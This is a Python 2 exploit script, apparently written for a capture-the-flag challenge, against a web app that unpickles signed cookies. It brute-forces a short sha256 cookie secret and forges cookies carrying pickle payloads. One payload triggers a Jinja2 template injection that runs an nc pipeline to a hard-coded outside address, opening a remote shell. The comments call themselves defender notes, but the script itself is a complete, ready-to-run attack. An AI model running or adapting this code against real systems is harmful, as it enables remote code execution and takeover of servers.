import requests
import cPickle
import sys
import os
import hashlib
from base64 import b64encode, b64decode
import string
import json
import flask
# class Target(object):
# def __reduce__(self):
# return (__import__, ('json',))
class Target(object):
    """Benign pickle probe.

    pickle serialises an object as the ``(callable, args)`` pair returned by
    ``__reduce__`` and calls ``callable(*args)`` when the bytes are loaded.
    Here the callable is ``repr``, so loading yields a marker string and has
    no side effect. The class is not referenced by the rest of the visible
    script.
    """

    def __reduce__(self):
        marker_args = ('This is marked',)
        return repr, marker_args
class Import(object):
    """Pickle payload whose load step evaluates ``__import__('flask')``.

    Whatever process unpickles an instance imports the ``flask`` module.
    This is the root problem with unpickling client-supplied bytes: the
    sender chooses which callable runs on load.
    """

    def __reduce__(self):
        module_name = 'flask'
        return __import__, (module_name,)
# Jinja2 template text that Execute hands to flask.render_template_string.
# It loops over the subclasses of `object` ([].__class__.__base__), selects the
# class named 'catch_warnings', and reaches the os module through that class's
# __init__.func_globals['linecache'] (func_globals is the Python 2 spelling) in
# order to call os.system with the nc pipeline below.
# Defender notes: the address and both ports are hard-coded on this page and can
# be treated as indicators; a web-app process spawning nc or /bin/sh is the
# behaviour to alert on. Rendering a template string that a client controls is
# equivalent to running client-supplied code.
shell = """
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{{ c.__init__.func_globals['linecache'].__dict__['os'].system('nc 139.59.244.42 31337 | /bin/sh | nc 139.59.244.42 31338') }}
{% endif %}
{% endfor %}
"""
class Execute(object):
    """Pickle payload whose load step renders the module-level ``shell`` template.

    On unpickling, ``flask.render_template_string(shell)`` is called in the
    loading process. The script sends an ``Import`` payload before this one;
    presumably so that ``flask`` is already imported on the receiving side
    (confirm against the target).
    """

    def __reduce__(self):
        template_args = (shell,)
        return flask.render_template_string, template_args
# Base URLs the script can talk to. `local` is later rebound to `remote`,
# so every request in the visible script goes to the remote host.
remote = 'http://47.75.151.118:9999/'
local = 'http://localhost:8888/'
def bruteforce():
    """Recover the four-character cookie secret by exhaustive search.

    The sample cookie has the form ``<sha256 hex>!<data>``. Each candidate of
    four characters from ``[A-Za-z0-9]`` is appended to ``data`` and hashed;
    the first candidate whose digest equals the cookie's hash is returned.
    Falls through (returning ``None``) if no candidate matches.

    Defender note: the search space is 62**4 (about 14.8 million) and the
    check is offline, because the tag is a plain ``sha256(data + secret)``
    rather than a keyed MAC with a long random key.
    """
    signed_cookie = '59ffbf1cbbe71c7f918cf9af735c04dca74126386230590b39bdac432031fa44!VmFhYWFhCnAwCi4='
    expected_digest, payload = signed_cookie.split('!')
    alphabet = string.ascii_letters + string.digits
    # Same enumeration order as four nested loops: the last position varies fastest.
    candidates = (
        first + second + third + fourth
        for first in alphabet
        for second in alphabet
        for third in alphabet
        for fourth in alphabet
    )
    for candidate in candidates:
        print '[!] Try:', candidate
        if hashlib.sha256(payload + candidate).hexdigest() == expected_digest:
            return candidate
def cretae_cookie(data, secret):
    """Build a cookie value of the form ``<sha256 hex of data+secret>!<data>``.

    The misspelled name is kept because the rest of the script calls it.

    Defender note: the tag is an unkeyed hash over ``data + secret``. A server
    that accepts such cookies should use an HMAC with a long random key and
    must not unpickle the data part; a plain data format such as JSON avoids
    code execution on load.
    """
    digest = hashlib.sha256(data + secret).hexdigest()
    return '%s!%s' % (digest, data)
# The brute-force step is disabled; the secret is hard-coded instead
# (presumably the value an earlier bruteforce() run returned).
# secret = bruteforce()
# print 'Secret:',secret
secret = 'hitb'
# Point every request below at the remote host instead of localhost.
local = remote
# Request 1: a signed `location` cookie carrying a pickled Import object.
# This only has an effect if the server unpickles the cookie data after
# checking the hash; that server code is not shown on this page.
data = b64encode(cPickle.dumps(Import()))
cookie = {'location' : cretae_cookie(data,secret)}
print cookie
requests.get(local,cookies=cookie)
# Request 2: the same cookie name, now carrying a pickled Execute object,
# whose load step renders the `shell` template.
# Mitigation on the receiving side: never unpickle client-controlled bytes,
# and authenticate cookies with an HMAC keyed by a long random secret.
cookie['location'] = cretae_cookie(b64encode(cPickle.dumps(Execute())),secret)
print cookie
req = requests.get(local,cookies=cookie)
print req.text